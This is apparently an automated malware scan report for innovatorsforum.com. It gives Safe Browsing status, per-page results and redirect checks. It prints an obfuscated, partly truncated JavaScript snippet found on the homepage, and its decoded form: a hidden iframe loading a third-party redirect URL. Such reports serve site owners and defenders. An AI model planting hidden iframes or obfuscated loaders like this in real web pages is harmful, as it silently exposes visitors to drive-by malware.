Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=innovatorsforum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://innovatorsforum.com/ | 200 OK Content-Length: 8116 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function lO10I01O0Ol1ll00 () { var O00I0O0OllIIIOlO='Cubd a 96 sagav azardga hag axcvdib c aa a aaedadndnbc aba tbb ahatadahafd, max bbazdnaaaqdnatbbd m aeb caecx ahbdaqcvcrdi d ga h aaa. Na y arcv diacb dahbd. Aw bdaybdaaandadgbc bdaqa q. Ar badbdga qbdaha eayav an dadgbabb ba ardicwc udnbdasag avaz arcw.'; return O00I0O0OllIIIOlO.toLowerCase(); } function l1OI1I0110O00I10 (lOIlllOIl0OOIOll, OOO01IOOl0Illl0I) { return lOIlllOIl0OOIOll.charCodeAt(OOO01IOOl0Illl0I); } functi { if (Ol010IOOOI011OO0){ IO100lIIllI10OlO = IOl00IIIO01010lI * O1OIOlIIIlIOl0I1; } else { IO100lIIllI10OlO += IOl00IIIO01010lI; Ill1I1l0l0O1I0OI += IlO1Il0O0I0l00Il(IO100lIIllI10OlO ^ IIIOO11O1lI1OOlI); IO100lIIllI10OlO = 0; } Ol010IOOOI011OO0 = !Ol010IOOOI011OO0; } } IlO1lOll00I1011O(Ill1I1l0l0O1I0OI); Decoded script: <iframe src="http://hugosgwsq.com/td/go.php?sid=1" style="visibility: hidden; display: none"></iframe> Antivirus reports:
| ||
http://innovatorsforum.com/index2.htm | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://innovatorsforum.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: innovatorsforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 01 Sep 2014 21:32:28 GMT
Accept-Ranges: bytes
ETag: "44218c24-1fb4-4848993776762"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 8116
Content-Type: text/html
Last-Modified: Sun, 18 Apr 2010 21:32:06 GMT
...8116 bytes of data.
GET / HTTP/1.1
Host: innovatorsforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 01 Sep 2014 21:32:28 GMT
Accept-Ranges: bytes
ETag: "44218c24-1fb4-4848993776762"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 8116
Content-Type: text/html
Last-Modified: Sun, 18 Apr 2010 21:32:06 GMT
...8116 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: innovatorsforum.com
Referer: http://www.google.com/search?q=innovatorsforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: innovatorsforum.com
Referer: http://www.google.com/search?q=innovatorsforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.